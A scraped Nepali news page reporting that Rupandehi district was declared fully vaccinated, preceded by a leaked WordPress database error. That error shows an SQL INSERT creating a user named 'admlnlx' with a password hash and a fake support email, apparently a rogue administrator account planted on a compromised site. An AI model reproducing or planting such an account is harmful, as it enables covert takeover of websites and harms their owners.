WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BS5F3eX0dBpdqAlUUTZW4n.GhVm7xN.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-28 04:14:03', '', 'admlnlx', 'admlnlx')
बुटवल, माघ २२–
रुपन्देही जिल्ला २२औँ पूर्ण खोपयुक्त जिल्ला घोषणा भएको छ ।
स्वास्थ्य राज्यमन्त्री तारामान गुरुङले शुक्रबार जिल्लालाई पूर्ण खोप जिल्ला घोषणा गर्दै घोषणालाई कार्यान्वयन गर्न सबै लाग्नुपर्ने बताउनुभयो ।
उहाँले भैरहवामा रहेको जिल्ला अस्पताललाई स्तर वृद्धि गरी १०० श्ययाको बनाउने कार्यलाई तत्काल कार्यान्यवन गरिने वचन दिँदै अस्पताललाई चाहिने उपकरण समेत तत्कालन उपलब्ध गराइने घोषणा गर्नुभयो ।
कार्यक्रममा स्वास्थ्य सेवा विभागका महानिर्देशक डा राजेन्द्र पन्तले खोप अभियानलाई सरकारले प्राथमिकताका साथ अगाडि बढाएको बताउँदै यस वर्ष खोपका चार प्रकार थप गरिन लागेको जानकारी दिनुभयो ।
विसं २०७० मा रुपन्देहीमा पहिलो पटक तत्कालीन शङ्करनगर गाविस पूर्ण खोपयुक्त घोषणा भएको थियो । त्यसको तीन वर्षपछि रुपन्देही पूर्ण खोप जिल्ला भएको हो । –रासस